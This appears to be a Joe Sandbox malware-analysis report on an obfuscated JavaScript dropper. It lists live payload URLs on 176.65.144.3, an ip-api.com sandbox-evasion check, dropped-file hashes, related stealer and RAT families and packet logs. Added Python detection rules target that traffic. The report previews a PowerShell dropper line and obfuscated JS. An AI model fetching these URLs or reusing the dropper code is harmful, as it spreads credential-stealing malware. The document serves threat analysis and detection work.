Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
206.23.85.13.in-addr.arpa | unknown | unknown | false | | high
212.20.149.52.in-addr.arpa | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://176.65.144.3/dev/devil.ps1 | true | Avira URL Cloud: safe | unknown
http://176.65.144.3/dev/DEV.exe | true | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | | high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000009.00000002.1361439763.000001BED1E03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1361439763.000001BED1C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://account.dyn.com/ | QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000009.00000002.1361439763.000001BED1E03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1361439763.000001BED1C5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://176.65.144.3 | QWQWSAADAF.exe, 0000000B.00000002.1365843658.00000000027E3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com | aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003276000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003191000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003258000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000009.00000002.1344482429.000001BEC3657000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.orgX | powershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://176.65.144.3/dev/DEV.exeP | QWQWSAADAF.exe, 0000000B.00000002.1365843658.0000000002781000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000009.00000002.1344482429.000001BEC1BE1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000009.00000002.1344482429.000001BEC1BE1000.00000004.00000800.00020000.00000000.sdmp, QWQWSAADAF.exe, 0000000B.00000002.1365843658.00000000027E3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003191000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000002.2454758646.0000000003258000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.1344482429.000001BEC1E12000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.org | powershell.exe, 00000009.00000002.1344482429.000001BEC31F6000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
176.65.144.3 | unknown | Germany | 12975 | PALTEL-ASPALTELAutonomousSystemPS | true
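The network side of this report is two observable patterns: plain-HTTP fetches of devil.ps1 and DEV.exe from the bare-IP host 176.65.144.3, and the http://ip-api.com/line/?fields=hosting request that the "Check if machine is in data center or colocation facility" signature describes, issued from the injected aspnet_compiler.exe. The Python below is an added example, not part of the Joe Sandbox report, that applies those two rules to constructed proxy-log lines. The key=value line format and the attribution of the DEV.exe download to powershell.exe are assumptions made for the example; the report itself attributes the 176.65.144.3 connection to wscript.exe and the ip-api.com connection to aspnet_compiler.exe.

```python
"""Proxy-log rules for the network behaviour in this report: payload downloads
from a bare-IP HTTP host and the ip-api.com hosting check.
Added example; the log format is constructed and matches no real proxy."""
import re
from urllib.parse import parse_qs, urlparse

# Constructed line shape: "<ts> proc=<image> url=<url> status=<code>" (assumption).
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+proc=(?P<proc>\S+)\s+url=(?P<url>\S+)\s+status=(?P<status>\d+)")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# .ps1 and .exe come from the report's URLs; the other extensions are an assumed extension.
PAYLOAD_EXT = (".ps1", ".exe", ".dll", ".vbs", ".js")
# Processes allowed to talk to ip-api.com without raising an alert (assumption).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}


def parse_line(line: str):
    """Parse one proxy line into a dict with a parsed URL, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["parsed"] = urlparse(rec["url"])
    return rec


def bare_ip_payload_download(rec) -> bool:
    """Plain-HTTP fetch of a script or PE from a host written as a literal IPv4 address."""
    u = rec["parsed"]
    return (u.scheme == "http"
            and IPV4_RE.match(u.hostname or "") is not None
            and u.path.lower().endswith(PAYLOAD_EXT))


def hosting_check(rec) -> bool:
    """Non-browser process asking ip-api.com whether the egress IP is hosting space."""
    u = rec["parsed"]
    fields = parse_qs(u.query).get("fields", [""])[0].lower().split(",")
    return (u.hostname == "ip-api.com"
            and "hosting" in fields
            and rec["proc"].lower() not in BROWSERS)


RULES = (bare_ip_payload_download, hosting_check)


def scan(log_text: str):
    """Return (rule name, process, url) for every line that trips a rule."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for rule in RULES:
            if rule(rec):
                hits.append((rule.__name__, rec["proc"], rec["url"]))
    return hits


# Constructed log lines modelled on the report's URLs and IP; not captured traffic.
SAMPLE_LOG = """\
2025-03-18T08:02:41Z proc=wscript.exe url=http://176.65.144.3/dev/devil.ps1 status=200
2025-03-18T08:02:55Z proc=powershell.exe url=http://176.65.144.3/dev/DEV.exe status=200
2025-03-18T08:03:30Z proc=aspnet_compiler.exe url=http://ip-api.com/line/?fields=hosting status=200
2025-03-18T08:04:02Z proc=chrome.exe url=https://www.example.com/ status=200
2025-03-18T08:04:10Z proc=chrome.exe url=http://ip-api.com/json/ status=200
"""

if __name__ == "__main__":
    for rule_name, proc, url in scan(SAMPLE_LOG):
        print(rule_name, proc, url)
```

Both rules are deliberately narrow: the hosting rule only fires when the `fields` parameter names `hosting`, which is the sandbox-evasion use of ip-api.com rather than a generic geolocation lookup, and the download rule requires a literal IPv4 host so that ordinary CDN fetches of .exe installers over hostnames do not trip it. Note that Avira URL Cloud rates both 176.65.144.3 URLs as safe, so reputation feeds alone would not have flagged this traffic.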
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1641301
Start date and time: 2025-03-18 08:02:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 35s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (Javascript)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO_111101111001.js
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winJS@8/8@3/2
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 39
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .js
• Exclude process from analysis (whitelisted): MpCmdRun.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.199.214.10, 172.202.163.200, 13.85.23.206, 52.149.20.212, 20.109.210.53
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 8152 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:03:20 | API Interceptor | 8x Sleep call for process: powershell.exe modified
03:03:22 | API Interceptor | 1x Sleep call for process: QWQWSAADAF.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | 73ybGtnYXx.exe | malicious | WhiteSnake Stealer | ip-api.com/line?fields=query,country
208.95.112.1 | yeah.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | PO-2513203-PDF.js | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Q3N5HdmTIp.exe | malicious | Unknown | ip-api.com/line?fields=query
208.95.112.1 | Q3N5HdmTIp.exe | malicious | Unknown | ip-api.com/line?fields=query
208.95.112.1 | XWCTtOuD5e.exe | malicious | Python Stealer, Exela Stealer, Njrat | ip-api.com/json
208.95.112.1 | WindowsDefender.exe | malicious | Python Stealer, Blank Grabber, Umbral Stealer | ip-api.com/json/?fields=225545
208.95.112.1 | Setup.exe | malicious | Python Stealer, Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | Planck Scale Lantern.exe | malicious | PureLog Stealer, XWorm, zgRAT | ip-api.com/line/?fields=hosting
208.95.112.1 | Setup(1).exe | malicious | Blank Grabber, Umbral Stealer | ip-api.com/json/?fields=225545
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | 73ybGtnYXx.exe | malicious | WhiteSnake Stealer | 208.95.112.1
ip-api.com | yeah.exe | malicious | XWorm | 208.95.112.1
ip-api.com | PO-2513203-PDF.js | malicious | AgentTesla | 208.95.112.1
ip-api.com | Q3N5HdmTIp.exe | malicious | Unknown | 208.95.112.1
ip-api.com | Q3N5HdmTIp.exe | malicious | Unknown | 208.95.112.1
ip-api.com | XWCTtOuD5e.exe | malicious | Python Stealer, Exela Stealer, Njrat | 208.95.112.1
ip-api.com | WindowsDefender.exe | malicious | Python Stealer, Blank Grabber, Umbral Stealer | 208.95.112.1
ip-api.com | Setup.exe | malicious | Python Stealer, Blank Grabber | 208.95.112.1
ip-api.com | Planck Scale Lantern.exe | malicious | PureLog Stealer, XWorm, zgRAT | 208.95.112.1
ip-api.com | Setup(1).exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
PALTEL-ASPALTELAutonomousSystemPS | main.exe | malicious | Quasar | 176.65.144.14
PALTEL-ASPALTELAutonomousSystemPS | payment copy.exe | malicious | FormBook | 176.65.144.3
PALTEL-ASPALTELAutonomousSystemPS | PO-2513203-PDF.js | malicious | AgentTesla | 176.65.144.3
PALTEL-ASPALTELAutonomousSystemPS | detalle_transferencia_14-03-2025_4845655.js | malicious | AgentTesla | 176.65.144.3
PALTEL-ASPALTELAutonomousSystemPS | PO-2513203-PDF.js | malicious | AgentTesla | 176.65.144.3
PALTEL-ASPALTELAutonomousSystemPS | Pagamento Processado.js | malicious | Remcos | 176.65.144.3
PALTEL-ASPALTELAutonomousSystemPS | cozzy.ps1 | malicious | Remcos | 176.65.144.3
PALTEL-ASPALTELAutonomousSystemPS | kent.ps1 | malicious | Remcos | 176.65.144.3
PALTEL-ASPALTELAutonomousSystemPS | DON.ps1 | malicious | MSIL Logger, MassLogger RAT | 176.65.144.3
PALTEL-ASPALTELAutonomousSystemPS | MKBOY.ps1 | malicious | Remcos | 176.65.144.3
TUT-ASUS | 73ybGtnYXx.exe | malicious | WhiteSnake Stealer | 208.95.112.1
TUT-ASUS | yeah.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | PO-2513203-PDF.js | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Q3N5HdmTIp.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | Q3N5HdmTIp.exe | malicious | Unknown | 208.95.112.1
TUT-ASUS | XWCTtOuD5e.exe | malicious | Python Stealer, Exela Stealer, Njrat | 208.95.112.1
TUT-ASUS | WindowsDefender.exe | malicious | Python Stealer, Blank Grabber, Umbral Stealer | 208.95.112.1
TUT-ASUS | Setup.exe | malicious | Python Stealer, Blank Grabber | 208.95.112.1
TUT-ASUS | Planck Scale Lantern.exe | malicious | PureLog Stealer, XWorm, zgRAT | 208.95.112.1
TUT-ASUS | Setup(1).exe | malicious | Blank Grabber, Umbral Stealer | 208.95.112.1
                                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\RUNPEE.dll | payment copy.exe | malicious | FormBook
C:\Users\user\AppData\Local\Temp\RUNPEE.dll | PO-2513203-PDF.js | malicious | AgentTesla
Process: C:\Windows\System32\wscript.exe
File Type: ASCII text, with very long lines (65473), with CRLF line terminators
Category: dropped
Size (bytes): 74577
Entropy (8bit): 5.243880832830631
Encrypted: false
SSDEEP: 1536:Wjtg/8sNrrWILRM7DEL5poZUwl+NxecSppiA:WjtgrrmEL5poZUwlie7pZ
MD5: DBA860AFCD41473A98F9DB6596EE5DF3
SHA1: 7956BB7C412CBC70E3A4A73EDF4F7E7AAFCDB786
SHA-256: CB6D35DD07576A50A9C84653A5902B75733D7D90A835C59BCC10CABE37EAE1DB
SHA-512: F84DBBB4879EA1EED5EAD51F52E1076A53A304F4ABC2405F893F9793B65BF39C5D1880C6C491DE9A9898A13299CD26C8B40688786D8EDC69594B800540B4AEE5
Malicious: true
Reputation: low
Preview: $SAFAGGAGXHXHX=[IO.Path]::Combine($env:TEMP,"QWQWSAADAF.exe")..[IO.File]::WriteAllBytes($SAFAGGAGXHXHX,[Convert]::FromBase64String("...
Process: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe
File Type: CSV text
Category: dropped
Size (bytes): 847
Entropy (8bit): 5.345615485833535
Encrypted: false
SSDEEP: 24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5: EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1: 250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256: 5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512: 2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious: false
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
Process: C:\Windows\System32\wscript.exe
File Type: ASCII text, with very long lines (65473), with CRLF line terminators
Category: dropped
Size (bytes): 74577
Entropy (8bit): 5.243880832830631
Encrypted: false
SSDEEP: 1536:Wjtg/8sNrrWILRM7DEL5poZUwl+NxecSppiA:WjtgrrmEL5poZUwlie7pZ
MD5: DBA860AFCD41473A98F9DB6596EE5DF3
SHA1: 7956BB7C412CBC70E3A4A73EDF4F7E7AAFCDB786
SHA-256: CB6D35DD07576A50A9C84653A5902B75733D7D90A835C59BCC10CABE37EAE1DB
SHA-512: F84DBBB4879EA1EED5EAD51F52E1076A53A304F4ABC2405F893F9793B65BF39C5D1880C6C491DE9A9898A13299CD26C8B40688786D8EDC69594B800540B4AEE5
Malicious: false
Reputation: low
Preview: $SAFAGGAGXHXHX=[IO.Path]::Combine($env:TEMP,"QWQWSAADAF.exe")..[IO.File]::WriteAllBytes($SAFAGGAGXHXHX,[Convert]::FromBase64String("...
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:NlllulxmH/lZ:NllUg
MD5: D904BDD752B6F23D81E93ECA3BD8E0F3
SHA1: 026D8B0D0F79861746760B0431AD46BAD2A01676
SHA-256: B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
SHA-512: 5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
Malicious: false
Reputation: moderate, very likely benign file
                                                                Preview:@...e................................. ..............@..........
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 55808
Entropy (8bit): 5.882502590352749
Encrypted: false
SSDEEP: 768:XxqiEn9jifPELbYHrh1NXfkH7MfTZZ/z/i8e7n9UMYMUlmBEVRdU38:BqiCs8Wrh1RVZ/z/i8novEVfU38
MD5: 509DA2F325053AC8CFC07C6EDDE04DE6
SHA1: 12C413E1AF6A0D3D73EC654CDDDE566CF6F244B6
SHA-256: A9F4F12CBE6DF4EE5BE7B9E0C27A40A1704D8F80610BE2396FA9A4BDF803C3E3
SHA-512: 30B08D6E7C26224FCC1DD37B5DB90D4C93ED5322586341B4842B4AA424934EEC10A848EBDB4F685FA89005220DC9E57F660A22D83FAD77A40806AC155EC1BA10
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
Process: C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 19968
Entropy (8bit): 5.531565144830617
Encrypted: false
SSDEEP: 384:5HSzizrOQNTVtLR+6GMYFE/vO4OzrloTjBEflOIRH9U:Z7n9UMYMUlmBEVRdU
MD5: A056E0F2616018E9493EB997D8BAE650
SHA1: 1ABD48EB2D2C69617CB5F672F7833C83B7EC5E1A
SHA-256: 480FE5832E1E06DE33096FCE7DD5E90BB1EC7203BF96664CF50E004B66A33854
SHA-512: 908566752174302BFB7753E2DC9F842B8108B16BC6182B9D963E4C17179C6F8AA2A16E5BC3A795474B79DB29DB5D205618D1A803B6B8BA90B09983335B121D5C
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:
• Filename: payment copy.exe, Detection: malicious
• Filename: PO-2513203-PDF.js, Detection: malicious
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type: ASCII text, with very long lines (4228), with no line terminators
Entropy (8bit): 5.914917350983175
TrID:
File name: PO_111101111001.js
File size: 4'228 bytes
MD5: 984ab95962169d6866f83e5ac3a18dcf
SHA1: a8878632a281723efcfab0dba45bb8bde09f0ca7
SHA256: c5963972b61874eb1381324ed1bfefa927fc2acacc6ad789356e3bc32b92ebd1
SHA512: 4b7fe016ee4748fed8266a38d47d8c684fc7c9e0b7fea4e960bcc98a182f23d508b5f611dc2018adad5814dcad3785167027c1c7d74b23ba95eedd93ed6748f5
SSDEEP: 96:bOt8mzZUpCKXcInAT4vmMlup4WmKiDCapqUBcVLa:+7UgKsiflupBmKiXpxBcVLa
TLSH: B391E7C8BE91A08C874213DB5E1F591ED671C6D2741ACD40E290F6E9FE50BA0F0B7978
File Content Preview: function c(b,d){var e=a();return c=function(f,g){f=f-0x1ee;var h=e[f];if(c['wqqHnW']===undefined){var i=function(m){var n='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var o='',p='';for(var q=0x0,r,s,t=0x0;s=m['charAt'](t++);~s&&(r=q
Icon Hash: 68d69b8bb6aa9a86


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-18T08:03:19.242426+0100 | 2018856 | ET MALWARE Windows executable base64 encoded | 1 | 176.65.144.3 | 80 | 192.168.2.4 | 49721 | TCP
                                                                  • Total Packets: 162
                                                                  • 80 (HTTP)
                                                                  • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 18, 2025 08:03:18.312002897 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:18.316822052 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:18.317033052 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:18.325815916 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:18.330523968 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002636909 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002654076 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002665997 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002679110 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002690077 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002703905 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:19.002738953 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002744913 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:19.002751112 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002760887 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002770901 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002783060 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:19.002783060 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.002821922 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:19.002855062 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:19.007565022 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.007577896 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
Mar 18, 2025 08:03:19.007631063 CET | 49721 | 80 | 192.168.2.4 | 176.65.144.3
Mar 18, 2025 08:03:19.007756948 CET | 80 | 49721 | 176.65.144.3 | 192.168.2.4
                                                                  Mar 18, 2025 08:03:19.007770061 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.007813931 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.007843018 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.122414112 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.122441053 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.122452021 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.122463942 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.122478008 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.122502089 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.122535944 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.122786045 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.122828960 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.122844934 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.122884989 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.123049021 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.123060942 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.123079062 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.123090029 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.123095989 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.123100996 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.123116970 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.123155117 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.123856068 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.123874903 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.123887062 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.123898029 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.123908997 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.123913050 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.123945951 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.124656916 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.124669075 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.124675035 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.124691963 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.124710083 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.124722958 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.124804974 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.125502110 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.125514984 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.125556946 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.242425919 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.242443085 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.242491961 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.242624044 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.242636919 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.242647886 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.242679119 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.242700100 CET4972180192.168.2.4176.65.144.3
                                                                  Mar 18, 2025 08:03:19.242805004 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.242815971 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.242834091 CET8049721176.65.144.3192.168.2.4
                                                                  Mar 18, 2025 08:03:19.242846012 CET8049721176.65.144.3192.168.2.4
